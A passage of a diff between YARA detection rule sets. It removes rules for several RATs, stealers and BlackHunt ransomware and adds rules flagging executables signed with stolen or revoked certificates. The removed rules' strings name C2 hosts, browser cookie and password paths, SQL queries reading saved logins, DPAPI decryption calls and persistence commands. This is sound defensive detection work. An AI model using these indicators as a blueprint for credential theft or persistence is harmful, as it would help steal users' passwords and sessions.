-		logic_hash = "260c6d90a89ddb6219a5cbad18058e41611ae2dc68a8d4e589fa6ca81853752f"
+		logic_hash = "a0abe691c6b0a7be8ceea313068a6943d611b1424a1a03e43b82239ddfe9cbd2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "! #\"'&(&*)>=@?POQOROSOTOUOVOWOXOYOZO[O^]{z|z}z~z" fullword wide
-		$s2 = "{0}{1}{2}" fullword wide
-		$s3 = "localhost" fullword wide
-		$s4 = "\\tdata" fullword wide
-		$s5 = "DecryptBlob" fullword ascii
-		$s6 = "GetMac" fullword ascii
-		$s7 = "GetHdc" fullword ascii
-		$s8 = "FindProc" fullword ascii
-		$s9 = "targetPid" fullword ascii
-		$s10 = "MessageSecurityOverTcp" fullword ascii
-		$s11 = "ListOfProcesses" fullword ascii
-		$s12 = "ListOfPrograms" fullword ascii
-		$s13 = "browserPaths" fullword ascii
-		$s14 = "configs" fullword ascii
-		$s15 = "scanners" fullword ascii
-		$s16 = "FileScannerRule" fullword ascii
+		thumbprint = "b15a4189dcbb27f9b7ced94bc5ca40b7e62135c3"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "14:2a:ac:42:17:e2:2b:52:5c:85:87:58:97:73:ba:9b" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Mediapi : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4026D6291F1Ac7Cf86C2C81172Cfb200 : FILE
 {
 	meta:
-		description = "Detects MediaPI"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "95db8772-1bcd-5eea-956c-c9578b8e1329"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "ea11705d-37a1-5050-b01a-b7fc523c675a"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11425-L11439"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5218-L5229"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2bce0a96b45e46c0cbd913dacb3dfe7ae1b519102d637e0fd9dabe2008037d94"
+		logic_hash = "c821f288bb6555e3955dfccf02edde2448f0499942eea24c488a6426985bff74"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "SomeFunction" ascii
-		$s2 = "\"stealth" ascii
-		$s3 = "\"ServAddr" ascii
-		$s4 = "\"ServPort" ascii
-		$s5 = "\"ServIp" ascii
-		$s6 = "\"wsaData" ascii
-		$s7 = "\"-socket" ascii
+		thumbprint = "2ae4328db08bac015d8965e325b0263c0809d93e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( ( 6 of them ) or ( 3 of them and pe.exports ( "SomeFunction" ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MztxUCVYqnxgsyqVryViRnMfHFYBgyVMXkXuVGqmyPx" and pe.signatures [ i ] . serial == "40:26:d6:29:1f:1a:c7:cf:86:c2:c8:11:72:cf:b2:00" )
 }
-rule DITEKSHEN_MALWARE_Win_Blackhunt : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00B0A308Fc2E71Ac4Ac40677B9C27Ccbad : FILE
 {
 	meta:
-		description = "Detects BlackHunt ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4bdb26dd-a424-54a6-b313-e98bdf18cfce"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "207aa920-528c-5fa2-a8d4-4a44da4c870e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11441-L11456"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5231-L5242"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "62e9bc505eff3e19ff0cdaf180e45e6d7917f0bec7cd9b007bee9fe1d9d09b66"
+		logic_hash = "a71c47475327fb6268db34cd9d47451090fa3e673accfa905d32ebfb35f11e40"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = /#BlackHunt_(Logs|BG|Icon|Public|Private|ID|ReadMe|Update)\.(txt|jpg|ico|key|hta)/ ascii wide
-		$s2 = /-(biggame|noencrypt|netinfo|nospread)/ fullword wide
-		$s3 = "/v \"*BlackHunt\" /t REG_SZ /d" wide
-		$s4 = "/sc onstart /TN \"Windows Critical Update\" /TR \"'%s' %s\" /F" wide
-		$s5 = "/v \"DisableChangePassword\" /t REG_DWORD /d" wide
-		$s6 = "<span> %s </span>this ID (<span> %s </span>)" wide
-		$s7 = "}div.header h1 span#hunter" wide
-		$s8 = "BLACK_HUNT_MUTEX" fullword ascii
+		thumbprint = "15e502f1482a280f7285168bb5e227ffde4e41a6"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Volpayk LLC" and pe.signatures [ i ] . serial == "00:b0:a3:08:fc:2e:71:ac:4a:c4:06:77:b9:c2:7c:cb:ad" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Scoutelite : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_009Ecaa6E28E7615Ef5A12D87E327264C0 : FILE
 {
 	meta:
-		description = "Detects ScoutElite"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "989f558b-f84c-5f64-b85d-618d83f96782"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/back-in-2017"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11458-L11531"
+		id = "8fd9f4e8-4ec3-5731-8032-e2657ee229ca"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5244-L5255"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "935bd891a9b68cb6ddad86db843de624f3a7ec0824f2b4c6ff0da56422b79668"
+		logic_hash = "24858027f62fd057c06dbf58b4a6e1e5f1dcd9429676232a8e66d231e713f56a"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$cmd1 = "command=scote_ping" fullword ascii
-		$cmd2 = "command=scote_info_ipconfig" fullword ascii
-		$cmd3 = "command=scote_info_systeminfo" fullword ascii
-		$cmd4 = "command=scote_connection|hwid=" fullword ascii
-		$cmd5 = "command=ping" fullword wide
-		$cmd6 = "command=screen_capture_init" fullword wide
-		$cmd7 = "command=screen_capture" fullword wide
-		$cmd8 = "command=silence_screenshot" fullword wide
-		$cmd9 = "command=silence_keylogger" fullword wide
-		$cmd10 = "command=silence_password" fullword wide
-		$cmd11 = "command=screen_thumb" fullword wide
-		$cmd12 = "command=filemanager_upload_tcp" fullword wide
-		$cmd13 = "command=filemanager_download" fullword wide
-		$cmd14 = "command=filemanager_init" fullword wide
-		$cmd15 = "command=filemanager_root" fullword wide
-		$cmd16 = "command=filemanager_folder_filemanager_file" fullword wide
-		$cmd17 = "command=filemanager_thumb" fullword wide
-		$cmd18 = "command=keylogger_init" fullword wide
-		$cmd19 = "command=keylogger_file" fullword wide
-		$cmd20 = "command=password_firefox" fullword wide
-		$cmd21 = "command=password_opera" fullword wide
-		$cmd22 = "command=password_chrome" fullword wide
-		$cmd23 = "command=password_all" fullword wide
-		$cmd24 = "command=password_init" fullword wide
-		$cmd25 = "command=misc_init" fullword wide
-		$cmd26 = "command=misc_process" fullword wide
-		$cmd27 = "command=misc_cmd" fullword wide
-		$cmd28 = "command=new_rcs" fullword wide
-		$cmd29 = "command=microphone_capture" fullword wide
-		$cmd30 = "command=microphone_capture_init" fullword wide
-		$cmd31 = "command=rvmedia_capture_init" fullword wide
-		$cmd32 = "command=rvmedia_list" fullword wide
-		$cmd33 = "command=rvmedia_resolution" fullword wide
-		$cmd34 = "command=webcam_capture_init" fullword wide
-		$cmd35 = "command=webcam_list" fullword wide
-		$cmd36 = "command=webcam_resolution" fullword wide
-		$cmd37 = "command=webcam_capture" fullword wide
-		$gcmd1 = "filemanager_download_ftp" fullword wide
-		$gcmd2 = "download_file_ftp" fullword wide
-		$gcmd3 = "filemanager_upload_http" fullword wide
-		$gcmd4 = "upload_file_http" fullword wide
-		$gcmd5 = "upload_url" fullword wide
-		$gcmd6 = "filemanager_delete" fullword wide
-		$gcmd7 = "filemanager_execute_file" fullword wide
-		$gcmd8 = /(microphone|webcam|rvmedia|keylogger|password|screen|filemanager)_(host|port|guid)/ nocase
-		$confs1 = "[nick_name]" fullword ascii
-		$confe1 = "[/nick_name]" fullword ascii wide
-		$confs2 = "[install_name]" fullword ascii wide
-		$confe2 = "[/install_name]" fullword ascii wide
-		$confs3 = "[install_folder]" fullword ascii wide
-		$confe3 = "[/install_folder]" fullword ascii wide
-		$confs4 = "[reg_startup]" fullword ascii wide
-		$confe4 = "[/reg_startup]" fullword ascii wide
-		$confs5 = "[folder_startup]" fullword ascii wide
-		$confe5 = "[/folder_startup]" fullword ascii wide
-		$confs6 = "[task_startup]" fullword ascii wide
-		$confe6 = "[/task_startup]" fullword ascii wide
-		$confs7 = "[injection]" fullword ascii wide
-		$confe7 = "[/injection]" fullword ascii wide
-		$confs8 = "[injection_process]" fullword ascii wide
-		$confe8 = "[/injection_process]" fullword ascii wide
-		$confs9 = "[connection]" fullword ascii wide
-		$confe9 = "[/connection]" fullword ascii wide
+		thumbprint = "50899ef5014af31cd54cb9a7c88659a6890b6954"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( 2 of ( $cmd* ) or 7 of ( $gcmd* ) or ( 2 of ( $confs* ) and 2 of ( $confe* ) ) or ( pe.exports ( "__elite" ) and 2 of them ) ) ) or ( 15 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HaqMkgGQmnNHpFsQmzMRDcavkPBzOcvMatDmcLHuDNoiQWMqj" and pe.signatures [ i ] . serial == "00:9e:ca:a6:e2:8e:76:15:ef:5a:12:d8:7e:32:72:64:c0" )
 }
-rule DITEKSHEN_MALWARE_Win_Scouteliteps
+
+rule DITEKSHEN_INDICATOR_KB_CERT_19985190B09206952Efd412D3Ccc18E2 : FILE
 {
 	meta:
-		description = "Detects actor PowerShell tool designed to steal browsers session cookie and passwords on-disk and in-memory"
-		author = "ditekshen"
-		id = "d2c04d55-9bf7-54f5-8053-835fa60f19cb"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/back-in-2017"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11534-L11569"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "bd94cfd0-adaa-5e37-880e-8ef50328499d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5257-L5268"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9b1047b8b485fcfa29225f53674050703d32498cfa99654c8ac5f8bfac29878e"
+		logic_hash = "6db1aaabd9a257e863a5ff771a736b705391602f7f5e2b799f8c47d3ae566f0f"
 		score = 75
-		quality = 37
-		tags = ""
-
-	strings:
-		$cnc1 = "http://beginpassport.com" ascii wide nocase
-		$cnc2 = "f_dump.php" ascii wide nocase
-		$cnc3 = "c_dump.php" ascii wide nocase
-		$cnc4 = "o_dump.php" ascii wide nocase
-		$db1 = "\\Google\\Chrome\\User Data\\Default\\Cookies" ascii wide nocase
-		$db2 = "\\Mozilla\\Firefox\\Profiles\\*.default" ascii wide nocase
-		$db3 = "\\Opera Software\\Opera Stable\\Cookies" ascii wide nocase
-		$db4 = "$($env:LOCALAPPDATA)\\Google\\Chrome\\User Data\\Default" ascii nocase
-		$db5 = "$($env:APPDATA)\\Mozilla\\Firefox\\Profiles\\*.default" ascii nocase
-		$db6 = "$($env:APPDATA)\\Opera Software\\Opera Stable" ascii nocase
-		$cond1 = "SSID" ascii wide
-		$cond2 = "MSPAuth" ascii wide
-		$cond3 = "\"'T'\"" ascii wide
-		$cond4 = "SNS_AA" ascii wide
-		$cond5 = "X-APPLE-WEBAUTH-TOKEN" ascii wide
-		$sql1 = "SELECT * FROM 'cookies' WHERE host_key LIKE $" ascii wide nocase
-		$sql2 = "SELECT * FROM 'moz_cookies' WHERE host LIKE $" ascii wide nocase
-		$sql3 = "SELECT origin_url, username_value ,password_value FROM 'logins'" ascii nocase
-		$def1 = "Add-Type -AssemblyName System.Security" ascii wide nocase
-		$def2 = "System.Security.SecureString" ascii wide nocase
-		$def3 = "ConvertFrom-SecureString" ascii wide nocase
-		$def4 = "[System.Security.Cryptography.ProtectedData]::Unprotect(" ascii wide nocase
-		$def5 = "[Security.Cryptography.DataProtectionScope]::LocalMachine" ascii wide nocase
-		$def6 = "[Security.Cryptography.DataProtectionScope]::CurrentUser" ascii wide nocase
-		$def7 = "System.Data.SQLite.SQLiteConnection" ascii wide nocase
-		$def8 = "[Environment]::OSVersion.ToString().Replace(\"Microsoft Windows \"," ascii wide nocase
-		$def9 = "Start-Sleep" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "49ec0580239c07da4ffba56dc8617a8c94119c69"
+		importance = 20
 
 	condition:
-		(1 of ( $cnc* ) and any of ( $db* ) and any of ( $cond* ) and any of ( $sql* ) and 7 of ( $def* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "cwcpbvBhYEPeJYcCNDldHTnGK" and pe.signatures [ i ] . serial == "19:98:51:90:b0:92:06:95:2e:fd:41:2d:3c:cc:18:e2" )
 }
-rule DITEKSHEN_MALWARE_Win_Houdiniconfig : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_03B27D7F4Ee21A462A064A17Eef70D6C : FILE
 {
 	meta:
-		description = "Detects Houdini Trojan configurations"
-		author = "ditekshen"
-		id = "e4f974fe-731e-55a8-aa5f-068a1e62f54d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/back-in-2017"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11600-L11616"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "96920ba8-b6d6-5cf4-9a3c-cb6f5c9b3048"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5270-L5281"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "70a67c9a91d2f82184f1d7a5ea51de911a054dd4e38e2cc36f495ed59219afab"
+		logic_hash = "53a4c4474b1add510624e23eac642e8cba145248d72a2ffc37d0aca141a041c2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "install_name="
-		$s2 = "nick_name="
-		$s3 = "install_folder="
-		$s4 = "reg_startup="
-		$s5 = "startup_folder_startup="
-		$s6 = "task_startup="
-		$s7 = "injection="
-		$s8 = "injection_process"
+		thumbprint = "a278b5c8a9798ee3b3299ec92a4ab618016628ee"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 5 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CCL TRADING LIMITED" and pe.signatures [ i ] . serial == "03:b2:7d:7f:4e:e2:1a:46:2a:06:4a:17:ee:f7:0d:6c" )
 }
-rule DITEKSHEN_MALWARE_Win_Houdini : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_66F98881Fbb02D0352Bef7C13Bd61Df2 : FILE
 {
 	meta:
-		description = "Detects the raw binary of the Houdini Trojan Delphi variant"
-		author = "ditekshen"
-		id = "79681ca3-b956-52d4-81b8-b3bd4c86872a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/back-in-2017"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11618-L11689"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "9cc569f4-1686-5f17-99a4-90750023d519"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5283-L5294"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0580d2525d9d989f98e815dd98b9258724b6e31f058092132c0fbd67cbc5c63c"
+		hash = "f265524fb9a4a58274dbd32b2ed0c3f816c5eff05e1007a2e7bba286b8ffa72c"
+		logic_hash = "3d70da3f644a90bc6e7b405a41225a328d7007187525a0b277f0fc1136be8b5b"
 		score = 75
-		quality = 46
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$hc = "houdiniclient" ascii wide nocase
-		$mk1 = "keylogger_thread" fullword ascii
-		$mk2 = "keyloger_host" fullword ascii
-		$mk3 = "keylogger_port" fullword ascii
-		$mk4 = "keylogger_thread" fullword ascii
-		$mk5 = "keylogger_init" fullword wide
-		$mk6 = "keylogger_stop" fullword wide
-		$mk7 = "keylogger_offline" fullword wide
-		$mk8 = "silence_keylogger" fullword wide
-		$ms1 = "screenshot_thread" fullword ascii
-		$ms2 = "screen_host" fullword ascii
-		$ms3 = "screen_port" fullword ascii
-		$ms4 = "screenshot_init" fullword wide
-		$ms5 = "screenshot_start" fullword wide
-		$ms6 = "screenshot_stop" fullword wide
-		$ms7 = "screen_thumb" fullword wide
-		$ms8 = "silence_screenshot" fullword wide
-		$mf1 = "file_manager_init" fullword wide
-		$mf2 = "file_manager_root" fullword wide
-		$mf3 = "file_manager_faf" fullword wide
-		$mf4 = "file_manager_download" fullword wide
-		$mf5 = "file_manager_upload" fullword wide
-		$mf6 = "file_manager_stop" fullword wide
-		$mf7 = "file_manager_delete_folder" fullword wide
-		$mf8 = "file_manager_rename_folder" fullword wide
-		$mf9 = "file_manager_rename_file" fullword wide
-		$mf10 = "file_manager_delete_file" fullword wide
-		$mf11 = "file_manager_execute_file" fullword wide
-		$mf12 = "file_manager_thumb" fullword wide
-		$mf13 = "file_manager_upload_http" fullword wide
-		$mf14 = "file_manager_upload_tcp" fullword wide
-		$mf15 = "upload_file_tcp" fullword wide
-		$mf16 = "download_file_tcp" fullword wide
-		$mf17 = "upload_file_http" fullword wide
-		$mf18 = "filemanager_host" fullword ascii
-		$mf19 = "filemanager_port" fullword ascii
-		$mf20 = "filemanager_thread" fullword ascii
-		$mp1 = "password_value" fullword wide
-		$mp2 = "password_init" fullword wide
-		$mp3 = "password_stop" fullword wide
-		$mp4 = "password_firefox" fullword wide
-		$mp5 = "password_chrome" fullword wide
-		$mp6 = "password_all" fullword wide
-		$mp7 = "password_host" fullword ascii
-		$mp8 = "password_port" fullword ascii
-		$mp9 = "password_thread" fullword ascii
-		$mm1 = "misc_init" fullword wide
-		$mm2 = "misc_stop" fullword wide
-		$mm3 = "misc_process_list" fullword wide
-		$mm4 = "misc_module_list" fullword wide
-		$mm5 = "misc_process_terminate" fullword wide
-		$mm6 = "misc_host" fullword ascii
-		$mm7 = "misc_port" fullword ascii
-		$mm8 = "misc_thread" fullword ascii
-		$pl1 = "plugin_file_init" fullword wide
-		$pl2 = "plugin_url_init" fullword wide
-		$pl3 = "plugin_stop" fullword wide
+		thumbprint = "722eee34153fc67ea7abdcb0c6e9e54479f1580e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "66:f9:88:81:fb:b0:2d:03:52:be:f7:c1:3b:d6:1d:f2" )
 }
-rule DITEKSHEN_MALWARE_Win_Lighthand : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3F8B1D4C656982A34435F971C9F3C301 : FILE
 {
 	meta:
-		description = "Detects LightHand"
-		author = "ditekshen"
-		id = "2b644dfb-f09a-50a5-8260-7b7022bce1f4"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "7bafe9c8-7ec5-5847-81dc-2f2d0753f784"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11691-L11718"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5296-L5307"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4f06467a522b786045839e6b22b888cecc554b0f63cc20dc43dc0f8ec80f5654"
+		logic_hash = "95fd60c5f236b06fca308696dfe3e3aeb3aa6f255c6030d44822dc33a7c4c917"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "27.102." ascii
-		$x2 = "109.248.150.179" fullword ascii
-		$s1 = /Hello (Client|Server)/ fullword ascii
-		$s2 = "%s|%s|%s|%s|%s|%s|" fullword wide
-		$s3 = "%s\\cmd.exe" fullword wide
-		$s4 = "Remote PC" fullword wide
-		$s5 = { 2e 62 61 74 [3-4] 3a 4c 31 0d 0a 64 65 6c
-                20 2f 46 20 22 25 73 22 0d 0a 69 66 20 65 78 69
-                73 74 20 22 25 73 22 20 67 6f 74 6f 20 4c 31 0d
-                0a 64 65 6c 20 2f 46 20 22 25 73 22 0d 0a 00 00
-                6f 70 65 6e }
-		$s6 = { 25 00 2e 00 32 00 66 00 47 00 42 00 00 00 00 00
-                25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00
-                0a 00 00 00 00 00 00 00 5c 00 2a 00 2e 00 2a 00
-                00 00 00 00 0a 00 00 00 2e 00 00 00 2e 00 2e 00
-                00 00 00 00 00 00 00 00 46 00 6f 00 6c 00 64 00
-                65 00 72 00 00 00 00 00 25 00 73 00 5c 00 25 00
-                73 00 00 00 00 00 00 00 25 00 64 00 42 00 00 00
-                25 00 2e 00 31 00 66 00 4b 00 42 00 00 00 00 00
-                25 00 2e 00 31 00 66 00 4d 00 42 }
+		thumbprint = "f12a12ac95e5c4fa9948dd743cc0e81e46c5222e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 5 of ( $s* ) ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Word" and pe.signatures [ i ] . serial == "3f:8b:1d:4c:65:69:82:a3:44:35:f9:71:c9:f3:c3:01" )
 }
-rule DITEKSHEN_MALWARE_Win_Validalpha : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ef9D0Cf071D463Cd63D13083046A7B8D : FILE
 {
 	meta:
-		description = "Detects ValidApha / BlackRAT"
-		author = "ditekshen"
-		id = "3162eb5f-6e2d-598a-b199-22b70ec8a773"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "f4b83bdf-ce07-5bad-b3e2-2c192d67f9f1"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11720-L11736"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5309-L5320"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "54d170076d1b32cee6f6252d40548acc7e23b467d692c59d6146a8aadf431211"
+		logic_hash = "9cf4ee1b3000d96d419bfd3e9ac3fb07f843aed735582c72e3a9799e2a56e364"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "RAT/Black/" ascii
-		$x2 = "RAT/Black/Client_Go/" ascii
-		$s1 = "main.RunTask" fullword ascii
-		$s2 = "main.CmdShell" fullword ascii
-		$s3 = "main.SelfDelete" fullword ascii
-		$s4 = "main.RecvPacket" fullword ascii
-		$s5 = "main.FileDownload" fullword ascii
-		$s6 = "main.CaptureScreen" fullword ascii
-		$s7 = "main.PeekNamedPipe" fullword ascii
+		thumbprint = "346849dfdeb9bb1a97d98c62d70c578dacbcf30c"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( 6 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rubin LLC" and pe.signatures [ i ] . serial == "00:ef:9d:0c:f0:71:d4:63:cd:63:d1:30:83:04:6a:7b:8d" )
 }
-rule DITEKSHEN_MALWARE_Win_Tigerrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00E1E7E596F8F5Ccbeed4Ab882B6Cfe6Ce : FILE
 {
 	meta:
-		description = "Detects TigerRAT"
-		author = "ditekshen"
-		id = "37192fc8-1932-5f33-994a-bb319b131c58"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "063d70e1-06b0-53f6-8edb-c81c89af0a05"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11738-L11756"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5322-L5333"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "38a238339db7e7f573e0c7362af5a08654a9e134f902c0ecae441250a0364c64"
+		logic_hash = "56977d47d8fcfd5eb7b5b4a141a9465e1cd2c497f05e61854e0ab09e2c7065a0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$m0 = ".?AVCryptorRC4@@" fullword ascii
-		$m1 = ".?AVModuleShell@@" fullword ascii
-		$m2 = ".?AVModuleKeyLogger@@" fullword ascii
-		$m3 = ".?AVModuleSocksTunnel@@" fullword ascii
-		$m4 = ".?AVModuleScreenCapture@@" fullword ascii
-		$m5 = ".?AVModulePortForwarder@@" fullword ascii
-		$s1 = "\\x9891-009942-xnopcopie.dat" fullword wide
-		$s2 = "(%02d : %02d-%02d %02d:%02d:%02d)--- %s[Clipboard]" fullword ascii
-		$s3 = "[%02d : %02d-%02d %02d:%02d:%02d]--- %s[Title]" fullword ascii
-		$s4 = "~KPTEMP" fullword wide
-		$s5 = "del \"%s\"%s \"%s\" goto " ascii
+		thumbprint = "4fec400152db868b07f202fd76366332aedc7b78"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) ) or ( 5 of ( $m* ) ) or ( 3 of ( $m* ) and 2 of ( $s* ) ) or ( 5 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LnvNzpvYjsjJOwcvwfalIvRAJHVApnpJU" and pe.signatures [ i ] . serial == "00:e1:e7:e5:96:f8:f5:cc:be:ed:4a:b8:82:b6:cf:e6:ce" )
 }
-rule DITEKSHEN_MALWARE_Win_Ktlvdoor : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_047801D5B55C800B48411Fd8C320Ca5B : FILE
 {
 	meta:
-		description = "Detects KTLVdoor"
